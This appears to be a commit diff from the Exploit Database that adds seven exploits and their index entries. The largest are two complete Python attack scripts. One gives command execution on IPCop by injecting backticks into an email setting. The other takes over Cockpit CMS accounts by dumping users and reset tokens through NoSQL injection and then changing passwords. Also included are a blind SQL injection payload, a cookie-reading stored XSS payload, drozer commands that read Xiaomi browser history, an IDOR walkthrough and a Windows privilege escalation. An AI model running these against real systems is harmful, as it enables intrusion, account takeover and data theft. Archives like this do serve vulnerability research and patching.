DB: 2021-08-11

7 changes to exploits/shellcodes

Amica Prodigy 1.7 - Privilege Escalation
Xiaomi browser 10.2.4.g - Browser Search History Disclosure
IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR
WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)
Simple Library Management System 1.0 - 'rollno' SQL Injection

exploits/android/local/50188.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure
+# Date: 27-Dec-2018
+# Exploit Author: Vishwaraj101
+# Vendor Homepage: https://www.mi.com/us
+# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/
+# Version: 10.2.4.g
+# Tested on: Tested in Android Version: 8.1.0
+# CVE : CVE-2018-20523
+
+*summary: *
+Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history.
+
+*Vulnerable component:* com.android.browser.searchhistory
+
+*Poc:*
+
+adb forward tcp:31415 tcp:31415
+
+drozer console connect
+
+drozer > run app.provider.query
+content://com.android.browser.searchhistory/searchhistory
+
+*Blogpost:*
+
+https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/

exploits/cgi/webapps/50183.py

@@ -0,0 +1,57 @@
+# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
+# Date: 02/08/2021
+# Exploit Author: Mücahit Saratar
+# Vendor Homepage: https://www.ipcop.org/
+# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
+# Version: 2.1.9
+# Tested on: parrot os 5.7.0-2parrot2-amd64
+
+#!/usr/bin/python3
+
+import requests as R
+import os
+import sys
+import base64
+import urllib3
+
+R.packages.urllib3.disable_warnings()
+R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
+try:
+    R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
+except AttributeError:
+    # no pyopenssl support used / needed / available
+    pass
+
+try:
+    hostport = sys.argv[1]
+    assert hostport[:8] == "https://" and hostport[-1] == "/"
+    url = hostport + "cgi-bin/email.cgi"
+    username = sys.argv[2].encode()
+    password = sys.argv[3].encode()
+    auth = base64.b64encode(username+b":"+password).decode()
+    command = sys.argv[4]
+    assert " " in command
+except:
+    print("[-] Usage https://host:port/ username password command(no spaces) <port for listen with nc - optional - >")
+    exit(1)
+
+
+rheader = {"Authorization":"Basic "+auth,
+        "Origin": hostport,
+        "Referer": url}
+
+rdata = {
+        "EMAIL_SERVER": "mucahitsaratar.github.io",
+        "EMAIL_USE_TLS": "auto",
+        "EMAIL_SERVER_PORT": "1337",
+        "EMAIL_USR": "ipcop@localdomain",
+        "EMAIL_PW": f"`{command}`",
+        "EMAIL_FROM": "ipcop@localdomainn",
+        "EMAIL_TO": "ipcop@localdomainnn",
+        "ACTION": "Kaydet" # change here to what is mean the "save && send test mail" in target language
+        }
+
+
+R.post(url,headers=rheader, data=rdata, verify=False)
+rdata["ACTION"] = "Test postası gönder" # send test mail
+R.post(url,headers=rheader, data=rdata, verify=False)

exploits/multiple/webapps/50185.py

@@ -0,0 +1,164 @@
+# Exploit Title: Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection 
+# Date: 06-08-2021
+# Exploit Author: Brian Ombongi
+# Vendor Homepage: https://getcockpit.com/
+# Version: Cockpit 0.11.1
+# Tested on: Ubuntu 16.04.7
+# CVE : CVE-2020-35847 & CVE-2020-35848
+
+#!/usr/bin/python3
+import json
+import re
+import requests
+import random
+import string
+import argparse
+
+
+def usage():
+    guide = 'python3 exploit.py -u <target_url> '
+    return guide
+
+def arguments():
+    parse = argparse.ArgumentParser(usage=usage())
+    parse.add_argument('-u', dest='url', help='Site URL e.g http://cockpit.local', type=str, required=True)
+    return parse.parse_args()
+
+def test_connection(url):
+	try:
+		get = requests.get(url)
+		if get.status_code == 200:
+			print(f"[+] {url}: is reachable")
+		else:
+			print(f"{url}: is Not reachable, status_code: {get.status_code}")
+	except requests.exceptions.RequestException as e:
+		raise SystemExit(f"{url}: is Not reachable \nErr: {e}")
+
+
+def enumerate_users(url):
+    print("[-] Attempting Username Enumeration (CVE-2020-35846) : \n")
+    url = url + "/auth/requestreset"
+    headers = {
+        "Content-Type": "application/json"
+    }
+    data= {"user":{"$func":"var_dump"}}
+    req = requests.post(url, data=json.dumps(data), headers=headers)
+    pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I)
+    matches = pattern.findall(req.content.decode('utf-8'))
+    if matches:
+        print ("[+] Users Found : " + str(matches))
+        return matches
+    else:
+        print("No users found")
+
+def check_user(usernames):
+    user = input("\n[-] Get user details For : ")
+    if user not in usernames:
+        print("User does not exist...Exiting")
+        exit()
+    else:
+        return user
+
+
+def reset_tokens(url):
+    print("[+] Finding Password reset tokens")
+    url = url + "/auth/resetpassword"
+    headers = {
+        "Content-Type": "application/json"
+        }
+    data= {"token":{"$func":"var_dump"}}
+    req = requests.post(url, data=json.dumps(data), headers=headers)
+    pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I)
+    matches = pattern.findall(req.content.decode('utf-8'))
+    if matches:
+        print ("\t Tokens Found : " + str(matches))
+        return matches
+    else:
+        print("No tokens found, ")
+
+
+def user_details(url, token):
+    print("[+] Obtaining user information ")
+    url = url + "/auth/newpassword"
+    headers = {
+        "Content-Type": "application/json"
+        }
+    userAndtoken = {}
+    for t in token:
+        data= {"token":t}
+        req = requests.post(url, data=json.dumps(data), headers=headers)
+        pattern=re.compile(r'(this.user\s*=)([^;]+)', re.I)
+        matches = pattern.finditer(req.content.decode('utf-8'))
+        for match in matches:
+            matches = json.loads(match.group(2))
+            if matches:
+                print ("-----------------Details--------------------")
+                for key, value in matches.items():
+                    
+                    print("\t", "[*]", key ,":", value)       
+            else:
+                print("No user information found.")
+            user = matches['user']
+            token = matches['_reset_token']
+            userAndtoken[user] = token
+            print("--------------------------------------------")
+            continue
+    return userAndtoken
+
+def password_reset(url, token, user):
+    print("[-] Attempting to reset %s's password:" %user)
+    characters = string.ascii_letters + string.digits + string.punctuation 
+    password = ''.join(random.choice(characters) for i in range(10))
+    url = url + "/auth/resetpassword"
+    headers = {
+        "Content-Type": "application/json"
+        }
+    data= {"token":token, "password":password}
+    req = requests.post(url, data=json.dumps(data), headers=headers)
+    if "success" in req.content.decode('utf-8'):
+        print("[+] Password Updated Succesfully!")
+        print("[+] The New credentials for %s is: \n \t Username : %s \n \t Password : %s" % (user, user, password))
+
+def generate_token(url, user):
+    url = url + "/auth/requestreset"
+    headers = {
+        "Content-Type": "application/json"
+        }
+    data= {"user":user}
+    req = requests.post(url, data=json.dumps(data), headers=headers)
+    
+def confirm_prompt(question: str) -> bool:
+    reply = None
+    while reply not in ("", "y", "n"):
+        reply = input(f"{question} (Y/n): ").lower()
+        if reply == "y":
+            return True
+        elif reply == "n":
+            return False
+        else:
+            return True
+
+def pw_reset_trigger(details, user, url):
+    for key in details:
+        if key == user:
+            password_reset(url, details[key], key)
+        else:
+            continue
+
+
+
+if __name__ == '__main__':
+    args = arguments()
+    url = args.url
+    test_connection(url)
+    user = check_user(enumerate_users(url))
+    generate_token(url, user)
+    tokens = reset_tokens(url)
+    details = user_details(url, tokens)
+    print("\n")
+    b = confirm_prompt("[+] Do you want to reset the passowrd for %s?" %user)
+    if b:
+        pw_reset_trigger(details, user, url)
+    else:
+        print("Exiting..")
+        exit()

exploits/php/webapps/50186.txt

@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR
+# Date: 2021-05-17
+# Exploit Author: captain_hook
+# Vendor Homepage: https://lifterlms.com
+# Software Link: https://lifterlms.com
+# Version: 4.21.1
+# Tested on: any
+
+Description
+
+The plugin was affected by an IDOR issue, allowing students to see other student answers and grades
+
+Proof of Concept
+
+- Add 2 users with Student role for the scenario .
+- Create A course With a quiz ( I picked True or Flase question for my quiz)
+- Set Enrol on Free ( for the ease of scenario )
+- Enrol into the Course with Student B and submit your answer to the Course .
+
+The plugin will give a token like :
+https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
+To Check your answer was true or false.
+
+Now Login as a Student A and Enroll in the Course. You can just use
+the URL https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
+and reach the Student B answer.
+
+Fixed in version 4.21.2✓
+
+References
+
+https://make.lifterlms.com/2021/05/17/lifterlms-version-4-21-2/

exploits/php/webapps/50187.txt

@@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)
+# Date: 2021-08-06 
+# Exploit Author: Aryan Chehreghani
+# Software Link: https://wordpress.org/plugins/picture-gallery/
+# Version: 1.4.2
+# Tested on: Windows 10
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.8
+2. Install and activate  Picture Gallery - Frontend Image Uploads, AJAX Photo List
+3. Navigate to admin menu wrap >> Picture Gallery >> Options >> Access Control Tab >> enter the XSS payload into the Edit Content URL input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: "><script>alert(document.cookie)</script>

exploits/php/webapps/50189.txt

@@ -0,0 +1,46 @@
+# Exploit Title: Simple Library Management System 1.0 - 'rollno' SQL Injection
+# Date: 2021-08-08
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Vendor Homepage: https://www.nikhilbhalerao.com/
+# Software Link: https://www.sourcecodester.com/php/14126/simple-library-management-system.html
+# Version: V1
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# Description:
+# PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# Vulnerable Request:
+
+POST /registration_authenticate.php HTTP/1.1
+Host: localhost
+Content-Length: 320
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/registration.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+rollno=000001&fname=Halit&mname=&lname=AKAYDIN&branch=&sem=&dob=&semail=hltakydn%40pm.me&gender=&bg=&contact=&address=&pass=123456&cpass=123456
+
+# Vulnerable Payload:
+# Parameter: rollno (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+rollno=ybGo' AND (SELECT 2194 FROM (SELECT(SLEEP(10)))IICl) AND 'vivZ'='vivZ&fname=Halit&mname=&lname=AKAYDIN&branch=&sem=&dob=&semail=hltakydn%40pm.me&gender=&bg=&contact=&address=&pass=123456&cpass=123456

exploits/windows/local/50184.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Amica Prodigy 1.7 - Privilege Escalation
+# Date: 2021-08-06
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://gestionaleamica.com - https://www.bisanziosoftware.com
+# Software Link: https://gestionaleamica.com/Download/AmicaProdigySetup.exe
+# Version: 1.7
+# Tested on: Windows 10 Pro 20H2 x64
+# CVE: CVE-2021-35312
+
+Amica Prodigy it's a backup solution from Amica softwares (GestionaleAmica: invoices, accounting, etc.,
+from website gestionaleamica.com), a CIR 2000 srl / Bisanzio Software srl
+
+A vulnerability was found in CIR 2000 / Gestionale Amica Prodigy v1.7. The Amica Prodigy's executable
+"RemoteBackup.Service.exe" has incorrect permissions, allowing a local unprivileged user to replace it
+with a malicious file that will be executed with "LocalSystem" privileges at scheduled time.
+
+C:\Users\user>icacls C:\AmicaProdigy\RemoteBackup.Service.exe
+
+C:\AmicaProdigy\RemoteBackup.Service.exe
+					NT AUTHORITY\Authenticated Users:(I)(M) NT
+					AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F)
+					BUILTIN\Users:(I)(RX) Elaborazione completata per 1 file.

files_exploits.csv

@@ -11378,6 +11378,8 @@ id,file,description,date,author,type,platform,port
 50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
 50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",2021-07-16,"Salman Asad",local,windows,
 50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",2021-07-15,TheFloW,local,linux,
+50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",2021-08-10,"Andrea Intilangelo",local,windows,
+50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",2021-08-10,"Vishwaraj Bhattrai",local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44312,3 +44314,8 @@ id,file,description,date,author,type,platform,port
 50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",2021-08-05,splint3rsec,webapps,php,
 50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-05,lanz,webapps,php,
 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,
+50183,exploits/cgi/webapps/50183.py,"IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-10,"Mücahit Saratar",webapps,cgi,
+50185,exploits/multiple/webapps/50185.py,"Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection",2021-08-10,"Brian Ombongi",webapps,multiple,
+50186,exploits/php/webapps/50186.txt,"WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR",2021-08-10,Captain_hook,webapps,php,
+50187,exploits/php/webapps/50187.txt,"WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)",2021-08-10,"Aryan Chehreghani",webapps,php,
+50189,exploits/php/webapps/50189.txt,"Simple Library Management System 1.0 - 'rollno' SQL Injection",2021-08-10,"Halit AKAYDIN",webapps,php,